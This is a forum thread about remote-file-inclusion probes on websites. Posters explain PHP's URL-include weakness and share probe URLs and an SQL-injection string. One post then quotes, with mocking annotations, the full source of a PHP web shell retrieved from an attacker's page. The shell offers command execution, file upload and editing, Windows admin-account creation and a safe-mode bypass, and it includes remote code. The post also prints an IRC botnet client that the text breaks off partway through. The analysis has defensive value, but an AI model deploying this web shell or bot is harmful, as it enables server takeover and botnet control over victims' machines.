Weird injection attempts
-
So...We noticed that some script kiddy (or zombie computers) was attempting to pull off some URL-parameter injection on some of our websites. Most often, they tried to change one of the URL parameters to a URL (i.e. http://www.example.com/?var=http://www.1337h4x0r/script.php). When I went to the URL being passed in, I found some PHP code:
<?php echo md5("just_a_test")>
Besides the fact that *none* of our pages are running on PHP, how in the hell is this supposed to work?
Are there pages out there that accept a URL as an argument and then arbitrarily execute whatever code is on that page? Is this some crazy bug in an older version of PHP?
-
It's not a bug, it's a feature! (The "mapping URI parameters to global variables" kind of feature)
PHP has, since a few versions, a framework for handling URI schemes. If any function that expects a local file path as an argument instead receives a string that looks like an URI, it will "automagically" attempt to call up the appropriate scheme handler and let it do the work of retrieving the file. So fopen("/file") would open "file" on the local drive, but fopen("http://example.com/file") would try to download it from example.com, completely transparent to your script.
In PHP's usual foresight and ingenuity, they expanded this mechanism to fancier functions as well - like include(). Combine that with a call to, let's say [code]include($_GET["module"] . "/init.php");[/code] in Joe Braindead's PHP script and you got your function on the silver table.
-
I expect they're probing for XSS holes. If they find a way to inject html goop into your pages, the real attack would contain a chunk of javascript instead.
-
@PSWorx said:
It's not a bug, it's a feature! (The "mapping URI parameters to global variables" kind of feature)
PHP has, since a few versions, a framework for handling URI schemes. If any function that expects a local file path as an argument instead receives a string that looks like an URI, it will "automagically" attempt to call up the appropriate scheme handler and let it do the work of retrieving the file. So fopen("/file") would open "file" on the local drive, but fopen("http://example.com/file") would try to download it from example.com, completely transparent to your script.
In PHP's usual foresight and ingenuity, they expanded this mechanism to fancier functions as well - like include(). Combine that with a call to, let's say [code]include($_GET["module"] . "/init.php");[/code] in Joe Braindead's PHP script and you got your function on the silver table.
Ah, that makes sense. Still, you'd have to be pretty damn stupid to write code that gets filenames from URL parameters...yikes!
-
@bighusker said:
@PSWorx said:
It's not a bug, it's a feature! (The "mapping URI parameters to global variables" kind of feature)
PHP has, since a few versions, a framework for handling URI schemes. If any function that expects a local file path as an argument instead receives a string that looks like an URI, it will "automagically" attempt to call up the appropriate scheme handler and let it do the work of retrieving the file. So fopen("/file") would open "file" on the local drive, but fopen("http://example.com/file") would try to download it from example.com, completely transparent to your script.
In PHP's usual foresight and ingenuity, they expanded this mechanism to fancier functions as well - like include(). Combine that with a call to, let's say [code]include($_GET["module"] . "/init.php");[/code] in Joe Braindead's PHP script and you got your function on the silver table.
Ah, that makes sense. Still, you'd have to be pretty damn stupid to write code that gets filenames from URL parameters...yikes!
I see you're new to this site.
-
I've been getting the same thing It happens 5 times day withing 5 minutes always around 10am. we're getting two things happening.
<FONT size=2>http://www.company.com/pcc/index.aspx?lnkID=http://www.sectoranime.com.mx/galeria/include/nokuc/kef/&imgID=PCC_conferences.jpg</FONT><FONT size=2> threw an error message. </FONT>
<FONT size=2>and </FONT>
<FONT size=2>your usual sql injection attempts.</FONT>
<FONT size=2></FONT><FONT color=#0000ff size=2>http://www.masspartnership.com/about/index.aspx?imgid=newsandevents.jpg&lnkid=newsandevents.ascx</FONT><FONT size=2>' and user>0 and ''=' threw an error message.</FONT>
<FONT size=2></FONT>
<FONT size=2> going to the url's shown always shows the same bit of php code. <?php echo md5("just_a_test")></FONT>
<FONT size=2>I've got a lit of 10 sites. that they try to pass.</FONT>
<FONT size=2>
</FONT>
-
found this on the web
Guest : 162.39.119.102 : July 12, 2007, 05:40:08 AM
/forums/index.php?board=15;action=display;threadid=2286/Sources/Packages.php?sourcedir=http://members.lycos.co.uk/kalafi0r/asd.txt???
kalafi0r seems to be some Polish script kiddy. On the move:
http://security.pigstye.net/staticpages/index.php/index$ nslookup 162.39.119.102
Server: 216.201.118.101
Address: 216.201.118.101#53Non-authoritative answer:
102.119.39.162.in-addr.arpa name = h102.119.39.162.ip.alltel.net.TRACE:
traceroute to h102.119.39.162.ip.alltel.net (162.39.119.102), 30 hops max, 38 byte packets
...
6 tbr2.attga.ip.att.net (12.122.10.137) 59.477 ms 55.821 ms 55.611 ms
MPLS Label=31746 CoS=3 TTL=1 S=0
7 gar5.attga.ip.att.net (12.123.20.181) 54.272 ms 54.308 ms 55.562 ms
8 12.118.120.118 (12.118.120.118) 54.081 ms 58.049 ms 85.980 ms
9 h121.21.213.151.ip.alltel.net (151.213.21.121) 63.574 ms 64.787 ms 64.962 ms
10 h54.33.213.151.ip.alltel.net (151.213.33.54) 62.919 ms h58.33.213.151.ip.alltel.net (151.213.33.58) 65.127 ms 64.626 ms
11 h123.21.213.151.ip.alltel.net (151.213.21.123) 70.105 ms h107.21.213.151.ip.alltel.net (151.213.21.107) 108.281 ms h123.21.213.151.ip.alltel.net (151.213.21.123) 68.374 ms
12 mthwnc-7200-2.alltel.net (166.102.102.232) 68.345 ms 68.061 ms 68.389 ms
13 h97.119.39.162.ip.alltel.net (162.39.119.97) 74.313 ms 74.527 ms 77.739 ms
14 h102.119.39.162.ip.alltel.net (162.39.119.102) 79.976 ms 77.663 ms 76.522Matthews, North Carolina? Not many poles there, probably a bot-infected win box
This topic doesn't exist on this board. - "2286/Sources/Packages.php?sourcedir=http://members.lycos.co.uk/kalafi0r/asd.txt???"
Our attacker is trying to get our server to include some extra unvalidated PHP code. The Lycos page has the following source:
=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~ malcode ~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=~=
<html>
<head>
<meta http-equiv="Content-Language" content="pt-br"><!-- FRONTAPAGE, HUH. SOMEONE HAS A SENSE OF HUMOR :) //-->
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="AoD">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><!-- BY POLSKI SCRIPT KIDD, WHO CAN CUT N PASTE REALLY LEET //-->
<title>By destructive > irc.gigachat.net > CMD > File List</title>
<style type="text/css">
A:link {text-decoration:none}
A:visited {text-decoration:none}
A:hover {text-decoration:underline}
A:active {text-decoration:underline}
</style>
</head>
<body style="font-family: Tahoma; font-size: 10px">
<?php@set_time_limit(0);
$string = $_SERVER['QUERY_STRING'];
$mhost = 'http://www.avto.bz/lang/.../cmd.txt?';
// NOT SURE WHAT WE'RE EXPLODING HERE, AVTO.BZ DOESN'T RESOLVE
// ALTHOUGH, THE GOOGLE CACHE SHOWS ITS GHOST:
// http://64.233.169.104/search?q=cache:J3mih5icxVEJ:www.avto.bz/links.php+"avto.bz"&hl=en&ct=clnk&cd=7&gl=us$host_all = explode("$mhost", $string);
$s1 = $host_all[0];// $_SERVER['PHP_SELF'] is filename of the currently executing script
// $fstring WILL BE THE SHORTHAND FOR THE XSS CALL TO OUR SERVER, TO GET IT TO EXECUTE
// ALL OF THE PROGS, FUNCTIONS, ETC$fstring = $_SERVER['PHP_SELF']."?".$s1.$mhost;
$OS = @PHP_OS;
$IpServer = '127.0.0.1';
$UNAME = @php_uname();
$PHPv = @phpversion();
$SafeMode = @ini_get('safe_mode');if ($SafeMode == '') { $SafeMode = "<i>OFF</i>"; }
else { $SafeMode = "<i>$SafeMode</i>"; }// BELOW SOURCES ONLY LOAD SRC FROM http://www.home-equity-loans-1.org/l.php
// CHANGED? ABANDONED?$btname = 'backtool.txt';
$bt = 'http://www.full-comandos.com/jobing/r0nin';
$dc = 'http://www.full-comandos.com/jobing/dc.txt';// LOOKS LIKE WE'RE MAKING WINDOWS ADMIN ACCOUNTS
// LOOK FOR WEBBOT'S INVOCATION OF "$cmd=$newuser"$newuser = '@echo off;net user Admin /add /expires:never /passwordreq:no;net localgroup "Administrators" /add Admin;net localgroup "Users" /del Admin';
// HERE'S SOME JS FILE WRANGLING FUNCTIONS (CHMOD, COPY, CD, RENAME, MKDIR)
// Java Script
echo "<script type="text/javascript">";
echo "function ChMod(chdir, file) {";
echo "var o = prompt('Chmod: - Exemple: 0777', '');";
echo "if (o) {";
echo "window.location="" + '{$fstring}&action=chmod&chdir=' + chdir + '&file=' + file + '&chmod=' + o + "";";
echo "}";
echo "}";
echo "function Rename(chdir, file, mode) {";
echo "if (mode == 'edit') {";
echo "var o = prompt('Rename file '+ file + ' for:', '');";
echo "}";
echo "else {";
echo "var o = prompt('Rename dir '+ file + ' for:', '');";
echo "}";
echo "if (o) {";
echo "window.location="" + '{$fstring}&action=rename&chdir=' + chdir + '&file=' + file + '&newname=' + o + '&mode=' + mode +"";";
echo "}";
echo "}";
echo "function Copy(chdir, file) {";
echo "var o = prompt('Copied for:', '/tmp/' + file);";
echo "if (o) {";
echo "window.location="" + '{$fstring}&action=copy&chdir=' + chdir + '&file=' + file + '&fcopy=' + o + "";";
echo "}";
echo "}";
echo "function Mkdir(chdir) {";
echo "var o = prompt('Which name?', 'NewDir');";
echo "if (o) {";
echo "window.location="" + '{$fstring}&action=mkdir&chdir=' + chdir + '&newdir=' + o + "";";
echo "}";
echo "}";
echo "function Newfile(chdir) {";
echo "var o = prompt('Which name?', 'NewFile.txt');";
echo "if (o) {";
echo "window.location="" + '{$fstring}&action=newfile&chdir=' + chdir + '&newfile=' + o + "";";
echo "}";
echo "}";
echo "</script>";// End JavaScript
/* Functions */ function cmd($CMDs) { $CMD[1] = ''; exec($CMDs, $CMD[1]); if (empty($CMD[1])) { $CMD[1] = shell_exec($CMDs); } elseif (empty($CMD[1])) { $CMD[1] = passthru($CMDs); } elseif (empty($CMD[1])) { $CMD[1] = system($CMDs); } elseif (empty($CMD[1])) { $handle = popen($CMDs, 'r'); while(!feof($handle)) { $CMD[1][] .= fgets($handle); } pclose($handle); } return $CMD[1]; }
if (@$_GET['chdir']) {
$chdir = $_GET['chdir'];
} else {
$chdir = getcwd()."/";
}
if (@chdir("$chdir")) {
$msg = "<font color="#008000">Entrance in the directory, OK!</font>";
} else {
$msg = "<font color="#FF0000">Error to enters it in the directory!</font>";
$chdir = str_replace($SCRIPT_NAME, "", $_SERVER['SCRIPT_NAME']);
}// REPLACE BACKSLASH WITH FWD SLASH, YEP ITS FOR WINDOWS ALLRIGHT
$chdir = str_replace(chr(92), chr(47), $chdir);
// CMD==UPLOAD: DENOTE SUCCESS IF WE UPLOAD OUR BOT CODE SUCCESSFULLY
if (@$_GET['action'] == 'upload') {
$uploaddir = $chdir;//USING HTTP POST TO UPLOAD JUNK ($_FILES)
$uploadfile = $uploaddir. $_FILES['userfile']['name'];
if (@move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir . $_FILES['userfile']['name'])) {
$msg = "<font color="#008000"><font color="#000080">{$_FILES['userfile']['name']}</font>, the archive is validates and was loaded successfully.</font>";
} else {
$msg = "<font color="#FF0000">Error when copying archive.</font>";
}
}//CMD==MKDIR: MAKE A NEW DIR
elseif (@$_GET['action'] == 'mkdir') {
$newdir = $_GET['newdir'];
if (@mkdir("$chdir"."$newdir")) {
$msg = "<font color="#008000"><font color="#000080">{$newdir}</font>, directory created successfully.</font>";
} else {
$msg = "<font color="#FF0000">Error to it creates directory.</font>";
}
}//CMD==NEWFILE: TOUCH OFF A FILE
elseif (@$_GET['action'] == 'newfile') {
$newfile = $_GET['newfile'];
if (@touch("$chdir"."$newfile")) {
$msg = "<font color="#008000"><font color="#000080">{$newfile}</font>, created successfully!</font>";
} else {
$msg = "<font color="#FF0000">Error to tries it creates archive.</font>";
}
}//CMD==DELETE:
// FILES
elseif (@$_GET['action'] == 'del') {
$file = $_GET['file']; $type = $_GET['type'];
if ($type == 'file') {
if (@unlink("$chdir"."$file")) {
$msg = "<font color="#008000"><font color="#000080">{$file}</font>, successfully excluded archive!</font>";
} else {
$msg = "<font color="#FF0000">Error to it I excluded archive!</font>";
}
// DIRS
} elseif ($type == 'dir') {
if (@rmdir("$chdir"."$file")) {
$msg = "<font color="#008000"><font color="#000080">{$file}</font>, successfully excluded directory!</font>";
} else {
$msg = "<font color="#FF0000">Error to it I excluded directory!</font>";
}
}
}// CMD==CHMOD: 777 SOME FILES
elseif (@$_GET['action'] == 'chmod') {
$file = $chdir.$_GET['file']; $chmod = $_GET['chmod'];
if (@chmod ("$file", $chmod)) {$msg = "<font color=\"#008000\">Chmod&nbsp;of</font>&nbsp;<font color=\"#000080\">{$_GET['file']}</font>&nbsp;<font color=\"#008000\">moved&nbsp;for</font>&nbsp;<font color=\"#000080\">$chmod</font>&nbsp;<font color=\"#008000\">successfully.</font>"; } else { $msg = '<font color=\"#FF0000\">Error&nbsp;when&nbsp;moving&nbsp;chmod.</font>'; }
}
//CMD==RENAME: RENAME
elseif (@$_GET['action'] == 'rename') {
$file = $_GET['file']; $newname = $_GET['newname'];
if (@rename("$chdir"."$file", "$chdir"."$newname")) {
$msg = "<font color="#008000">Archive</font> <font color="#000080">{$file}</font> <font color="#008000">named for</font> <font color="#000080">{$newname}</font> <font color="#008000">successfully!</font>";
} else {
$msg = "<font color="#FF0000">Error to it nominates archive.</font>";
}
}//CMD==COPY: DUPE SOME SHIT
elseif (@$_GET['action'] == 'copy') {
$file = $chdir.$_GET['file']; $copy = $_GET['fcopy'];
if (@copy("$file", "$copy")) {
$msg = "<font color="#000080">{$file}</font>, <font color="#008000">copied for</font> <font color="#000080">{$copy}</font> <font color="#008000">successfully!</font>";
} else {
$msg = "<font color="#FF0000">Error when copying</font> <font color="#000000">{$file}</font> <font color="#FF0000">for</font> <font color="#000000">{$copy}</font></font>";
}
}
/* Parte Atualiza 02:48 12/2/2006 *///CMD==COMMAND: DO SOME SHIT
elseif (@$_GET['action'] == 'cmd') {
if (!empty($_GET['cmd'])) { $cmd = @$_GET['cmd']; }
if (!empty($_POST['cmd'])) { $cmd = @$_POST['cmd']; }$cmd = stripslashes(trim($cmd)); $result_arr = cmd($cmd); $afim = count($result_arr); $acom = 0; $msg = ''; $msg .= "<p style=\"color: #000000;text-align: center;font-family: 'Lucida Console';font-size: 12px;margin 2\">Results:&nbsp;<b>".$cmd."</b></p>"; if ($result_arr) { while ($acom <= $afim) { $msg .= "<p style=\"color: #008000;text-align: left;font-family: 'Lucida Console';font-size: 12px;margin 2\">&nbsp;".@$result_arr[$acom]."</p>"; $acom++; } } else { $msg .= "<p style=\"color: #FF0000;text-align: center;font-family: 'Lucida Console';font-size: 12px;margin 2\">Erro ao executar comando.</p>"; // ERRO AO EXECUTAR COMANDO??? PORTUGUESE HAX0R mebbe? }
}
elseif (@$_GET['action'] == 'safemode') {// CHECKING FOR/USING SHARED MEMORY OPS SO WE CAN
// EXECUTE THE PHP SAFE MODE BYPASS:
// http://securityvulns.com/files/safe_mode_bypass.phpif (@!extension_loaded('shmop')) {
echo "Loading... module</br>";if (strtoupper(substr(PHP_OS, 0,3) == 'WIN')) { @dl('php_shmop.dll'); } else { @dl('shmop.so'); }
}
if (@extension_loaded('shmop')) {
echo "Module: <b>shmop</b> loaded!</br>";// PHP SAFE MODE BYPASS:
$shm_id = @shmop_open(0xff2, "c", 0644, 100);
if (!$shm_id) { echo "Couldn't create shared memory segment\n"; }
$data="\x00";
$offset=-3842685;
$shm_bytes_written = @shmop_write($shm_id, $data, $offset);
if ($shm_bytes_written != strlen($data)) { echo "Couldn't write the entire length of data\n"; }
if (!shmop_delete($shm_id)) { echo "Couldn't mark shared memory block for deletion."; }
echo passthru("id");
shmop_close($shm_id);} else { echo "Module: <b>shmop</b> not loaded!</br>"; }
}// CMD==ZIP FILES
elseif (@$_GET['action'] == 'zipen') {
$file = $_GET['file'];
$zip = @zip_open("$chdir"."$file");
$msg = '';
if ($zip) {while ($zip_entry = zip_read($zip)) { $msg .= "Name: " . zip_entry_name($zip_entry) . "\\n"; $msg .= "Actual Filesize: " . zip_entry_filesize($zip_entry) . "\\n"; $msg .= "Compressed Size: " . zip_entry_compressedsize($zip_entry) . "\\n"; $msg .= "Compression Method: " . zip_entry_compressionmethod($zip_entry) . "\\n"; if (zip_entry_open($zip, $zip_entry, "r")) { echo "File Contents:\\n"; $buf = zip_entry_read($zip_entry, zip_entry_filesize($zip_entry)); echo "$buf\\n"; zip_entry_close($zip_entry); } echo "\\n"; } zip_close($zip);
}
}//CMD==EDIT
elseif (@$_GET['action'] == 'edit') {
$file = $_GET['file'];
$conteudo = '';
$filename = "$chdir"."$file";// read file $filename into string $conteudo
// Conteúdo?? That's Portuguese for "content" y'all - hmmm
// Portuguese?? interesting.....$conteudo = @file_get_contents($filename);
// Convert special characters to HTML entities
$conteudo = htmlspecialchars($conteudo);
//$_SERVER is an array containing information such as headers, paths, and script locations. IT IS PART OF THE register_globals SECURITY FIASCO (right? check my facts here, I'm not 100% on that).
$back = $_SERVER['HTTP_REFERER'];
echo "<p align="center">Editing {$file} ...</p>";
echo "<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="editacao">";
echo "<tr>";
echo "<td width="100%">";
echo "<form method="POST" action="{$fstring}&action=save&chdir={$chdir}&file={$file}">";// NOTICE THE REFERENCE TO "webbot" AND ITS LOGFILE: _private/form_results.csv
echo "<!--webbot bot="SaveResults" u-file="_private/form_results.csv" s-format="TEXT/CSV" s-label-fields="TRUE" --><p align="center">";
print "<textarea rows="18" name="S1" cols="89" style="font-family: Verdana; font-size: 10pt; border: 1px solid #000000">{$conteudo}</textarea></p>";
echo "<p align="center">";
echo "<input type="submit" value="Save" name="B2" style="font-family: Tahoma; font-size: 10px; border: 1px solid #000000"> ";
echo "<input type="button" value="Closes Publisher" Onclick="javascript:window.location='{$fstring}&chdir={$chdir}'" name="B1" style="font-family: Tahoma; font-size: 10px; border: 1px solid #000000"> ";
echo "</form>";
echo "</td>";
echo "</tr>";
echo "</table>";
}//CMD==SAVE
elseif (@$_GET['action'] == 'save') {
$filename = "$chdir".$_GET['file'];
$somecontent = $_POST['S1'];
$somecontent = stripslashes(trim($somecontent));
if (is_writable($filename)) {
@$handle = fopen ($filename, "w");
@$fw = fwrite($handle, $somecontent);
@fclose($handle);
if ($handle && $fw) {
$msg = "<font color="#000080">{$_GET['file']}</font>, <font color="#008000">edited successfully!</font>";
}
} else {
$msg = "<font color="#000000">{$_GET['file']},</font> <font color="#FF0000">cannot be written!</font>";
}
}// INVENTORY TIME!!
// Informa��es
$cmdget = '';
if (!empty($_GET['cmd'])) { $cmdget = @$_GET['cmd']; }
if (!empty($_POST['cmd'])) { $cmdget = @$_POST['cmd']; }
$cmdget = htmlspecialchars($cmdget);
function asdads() {
$asdads = '';// LESSEE WHAT KEWL TOOLS ARE PRELOADED FOR US....
if (@file_exists("/usr/bin/wget")) { $asdads .= "wget "; }
if (@file_exists("/usr/bin/fetch")) { $asdads .= "fetch "; }
if (@file_exists("/usr/bin/curl")) { $asdads .= "curl "; }
if (@file_exists("/usr/bin/GET")) { $asdads .= "GET "; }
if (@file_exists("/usr/bin/lynx")) { $asdads .= "lynx "; }
return $asdads;
}//ID THE SYSTEM OS AND PHP VERSIONS
echo "<form method="POST" name="cmd" action="{$fstring}&action=cmd&chdir=$chdir">";
echo "<fieldset style="border: 1px solid #000000; padding: 2">";
echo "<legend>Informa��es</legend>";
echo "<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse; font-family: Tahoma; font-size: 10px" width="100%">";
echo "<tr>";
echo "<td width="8%">";
echo "<p align="right"><b>Sistema:</b> </td></p>";
echo "<td width="92%"> {$OS}</td>";
echo "</tr>";
echo "<tr>";
echo "<td width="8%">";
echo "<p align="right"><b>Uname: </b></td></p>";
echo "<td width="92%"> {$UNAME}</td>";
echo "</tr>";
echo "<tr>";
echo "<td width="8%">";
echo "<p align="right"><b>PHP: </b></td></p>";
echo "<td width="92%"> {$PHPv}, <b>safe mode:</b> {$SafeMode}</td>";
echo "</tr>";
if (strtoupper(substr($OS, 0,3) != 'WIN')) {
$Methods = asdads();
if ($Methods == '') { $Methods = "???"; }
echo "<tr>";
echo "<td width="8%">";
echo "<p align="right"><b>Methods: </b></td></p>";
echo "<td width="92%"> {$Methods}</td>";
echo "</tr>";
}echo "<tr>";
echo "<td width="8%">";
echo "<p align="right"><b>Ip: </b></td></p>";
echo "<td width="92%"> {$IpServer}</td>";
echo "</tr>";
echo "<tr>";
echo "<td width="8%">";
echo "<p align="right"><b>Command: </b></td></p>";
echo "<td width="92%"> <input type="text" size="70" name="cmd" value="{$cmdget}" style="font-family: Tahoma; font-size: 10 px; border: 1px solid #000000"> <input type="submit" name="action" value="Send" style="font-family: Tahoma; font-size: 10 px; border: 1px solid #000000"></td>";
echo "</tr>";
echo "</table>";
echo "</fieldset></form>";
// Direcho "<form method="POST" action="{$fstring}&action=upload&chdir=$chdir" enctype="multipart/form-data">";
//webbot upload, mkdir, (use cases, "action=blah")
echo "<!--webbot bot="FileUpload" u-file="_private/form_results.csv" s-format="TEXT/CSV" s-label-fields="TRUE" --><fieldset style="border: 1px solid #000000; padding: 2">";
if (is_writable("$chdir")) {
if (strtoupper(substr($OS, 0,3) == 'WIN')) {
echo "<legend>Dir <b>YES</b>: {$chdir} - <a href="#[New Dir]" onclick="Mkdir('{$chdir}');">[New Dir]</a> <a href="#[New File]" onclick="Newfile('{$chdir}')">[New File]</a> <a href="{$fstring}&action=cmd&chdir={$chdir}&cmd=$newuser">[Remote Access]</a></legend>";
} else {
echo "<legend>Dir <b>YES</b>: {$chdir} - <a href="#[New Dir]" onclick="Mkdir('{$chdir}');">[New Dir]</a> <a href="#[New File]" onclick="Newfile('{$chdir}')">[New File]</a> <a href="{$fstring}&action=backtool&chdir={$chdir}&write=yes">[BackTool]</a></legend>";
}
}
else {
if (strtoupper(substr($OS, 0,3) == 'WIN')) {
echo "<legend>Dir NO: {$chdir} - <a href="#[New Dir]" onclick="Mkdir('{$chdir}');">[New Dir]</a> <a href="#[New File]" onclick="Newfile('{$chdir}')">[New File]</a> <a href="{$fstring}&action=cmd&chdir={$chdir}&cmd={$newuser}">[Remote Access]</a></legend>";
} else {
echo "<legend>Dir NO: {$chdir} - <a href="#[New Dir]" onclick="Mkdir('{$chdir}');">[New Dir]</a> <a href="#[New File]" onclick="Newfile('{$chdir}')">[New File]</a> <a href="{$fstring}&action=backtool&chdir={$chdir}&write=no">[BackTool]</a></legend>";
}
}if (@!$handle = opendir("$chdir")) {
echo " I could not enters in the directory, <a href="{$fstring}">click here!</a> for return to the original directory!</br>";
}
else {
echo " <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse; font-family: Tahoma; font-size: 10px" width="100%">";
echo " <tr>";
echo " <td width="100%" style="font-family: Tahoma; font-size: 10px" colspan="4"> Upload:";
echo " <input type="file" name="userfile" size="91" style="font-family: Tahoma; font-size: 10px; border-style: solid; border-width: 1">";
echo " <input type="submit" value="Send" name="B1" style="font-family: Tahoma; font-size: 10px; border: 1px solid #000000"></td>";
echo " </tr>";
echo " <tr>";
echo " <td width="100%" style="font-family: Tahoma; font-size: 10px" colspan="4"> </td>";
echo " </tr>";
echo " <tr>";
echo " <td width="100%" style="font-family: Tahoma; font-size: 10px" colspan="4">";
if (@!$msg) {
echo " <p align="left">Messages</td>";
} else {
echo " <p align="left">$msg</td>";
}
echo " </tr>";
echo " <tr>";
echo " <td width="100%" colspan="4"> </td>";
echo " </tr>";
echo " <tr>";
echo " <td width="9%"> Perms</td>";
echo " <td width="49%"> File </td>";
echo " <td width="10%"> Size </td>";
echo " <td width="32%"> Commands</td>";
echo " </tr>";
$colorn = 0;
while (false !== ($file = readdir($handle))) {
if ($file != '.') {
if ($colorn == 0) {
$color = "style="background-color: #FFCC66"";
}
elseif ($colorn == 1) {
$color = "style="background-color: #C0C0C0"";
}
if (@is_dir("$chdir"."$file")) {
$file = $file.'/';
$mode = 'chdir';
} else {
$mode = 'edit';
}
if (@substr("$chdir", strlen($chdir) -1, 1) != '/') {
$chdir .= '/';
}
if ($file == '../') {
$lenpath = strlen($chdir); $baras = 0;
for ($i = 0;$i < $lenpath;$i++) { if ($chdir{$i} == '/') { $baras++; } }
$chdir_ = explode("/", $chdir);
$chdirpox = str_replace($chdir_[$baras-1].'/', "", $chdir);
}
$perms = @fileperms ("$chdir"."$file");
if ($perms == '') {
$perms = '???';
}
$size = @filesize ("$chdir"."$file");
$size = $size / 1024;
$size = explode(".", $size);
if (@$size[1] != '') {
$size = $size[0].'.'.@substr("$size[1]", 0, 2);
} else {
$size = $size[0];
}
if ($size == 0) {
if ($mode == 'chdir') {
$size = '???';
}
}
echo "<tr>";
echo "<td width="9%" $color> $perms</td>";
if (@is_writable ("$chdir"."$file")) {
if ($mode == 'chdir') {
if ($file == '../') {
echo "<td width="49%" $color> <b><a href="{$fstring}&chdir=$chdirpox">$file</a></b></td>";
} else {
echo "<td width="49%" $color> <b><a href="{$fstring}&chdir={$chdir}{$file}">$file</a></b></td>";
}
} else {
if (is_readable("$chdir"."$file")) {
echo "<td width="49%" $color> <b><a href="{$fstring}&action=edit&chdir=$chdir&file=$file">$file</a></b></td>";
} else {
echo "<td width="49%" $color> <b>$file</b></td>";
}
}
}
else {
if ($mode == 'chdir') {
if ($file == '../') {
echo "<td width="49%" $color> <a href="{$fstring}&chdir=$chdirpox">$file</a></td>";
} else {
echo "<td width="49%" $color> <a href="{$fstring}&chdir={$chdir}{$file}">$file</a></td>";
}
} else {
if (@is_readable("$chdir"."$file")) {
echo "<td width="49%" $color> <a href="{$fstring}&action=edit&chdir=$chdir&file=$file">$file</a></td>";
} else {
echo "<td width="49%" $color> $file</td>";
}
}
}
echo "<td width="10%" $color> $size KB</td>";
if ($mode == 'edit') {
echo "<td width="32%" $color> <a href="#{$file}" onclick="Rename('{$chdir}', '{$file}', '{$mode}')">[Rename]</a> <a href="{$fstring}&action=del&chdir={$chdir}&file={$file}&type=file">[Del]</a> <a href="#{$file}" onclick="ChMod('$chdir', '$file')">[Chmod]</a> <a href="#{$file}" onclick="Copy('{$chdir}', '{$file}')">[Copy]</a></td>";
} else {
echo "<td width="32%" $color> <a href="#{$file}" onclick="Rename('{$chdir}', '{$file}', '{$mode}')">[Rename]</a> <a href="{$fstring}&action=del&chdir={$chdir}&file={$file}&type=dir">[Del]</a> <a href="#{$file}" onclick="ChMod('$chdir', '$file')">[Chmod]</a> [Copy]</td>";
}
echo "</tr>";
if ($colorn == 0) {
$colorn = 1;
}
elseif ($colorn == 1) {
$colorn = 0;
}
}
}
closedir($handle);
}
include 'http://members.lycos.co.uk/kalafi0r/up.txt?';
?>
</table>
</fieldset></form>
<p align="center">// HEY GREAT!!! AT LEAST CRACKERS CARE ABOUT STANDARDS...
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.w3.org/Icons/valid-html401" alt="Valid HTML 4.01 Transitional" height="31" width="88"></a>
</p>
</body></html>
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
up.txt
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
<?// GOSH THIS LOOKS LIKE http://see-your-ip.info/phpbot.txt
set_time_limit(0);
error_reporting(0);class pBot
{
var $config = array("server"=>"tucows.westlin.com",
"port"=>6667,
"pass"=>"", //senha do server (sendpass to server)
"prefix"=>"elo_bot",
"maxrand"=>8,
"chan"=>"#test",
"key"=>"t3st", //senha do canal (sendpass to channel)
"modes"=>"+p",
"password"=>"root", //senha do bot (sendpass to bot)
"trigger"=>".",
"hostauth"=>"" // * for any hostname
);
var $users = array();
function start()
{
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))
$this->start();
$ident = "";
$alph = range("a","z");
for($i=0;$i<$this->config['maxrand'];$i++)
$ident .= $alph[rand(0,25)];
if(strlen($this->config['pass'])>0)
$this->send("PASS ".$this->config['pass']);
$this->send("USER $ident 127.0.0.1 localhost :$ident");
$this->set_nick();
$this->main();
}
function main()
{
while(!feof($this->conn))
{
$this->buf = trim(fgets($this->conn,512));
$cmd = explode(" ",$this->buf);
if(substr($this->buf,0,6)=="PING :")
{
$this->send("PONG :".substr($this->buf,6));
}
if(isset($cmd[1]) && $cmd[1] =="001")
{
$this->send("MODE ".$this->nick." ".$this->config['modes']);
$this->join($this->config['chan'],$this->config['key']);
}
if(isset($cmd[1]) && $cmd[1]=="433")
{
$this->set_nick();
}
if($this->buf != $old_buf)
{
$mcmd = array();
$msg = substr(strstr($this->buf," :"),2);
$msgcmd = explode(" ",$msg);
$nick = explode("!",$cmd[0]);
$vhost = explode("@",$nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0],1);
$host = $cmd[0];
if($msgcmd[0]==$this->nick)
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i+1];
}
else
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i];
}
if(count($cmd)>2)
{
switch($cmd[1])
{
case "QUIT":
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case "PART":
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case "PRIVMSG":
if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == ""))
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{
case "user":
if($mcmd[1]==$this->config['password'])
{
$this->privmsg($this->config['chan'],"[\2auth\2]: $nick logged in");
$this->log_in($host);
}
else
{
$this->privmsg($this->config['chan'],"[\2auth\2]: Incorrect password from $nick");
}
break;
}
}
}
elseif($this->is_logged_in($host))
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
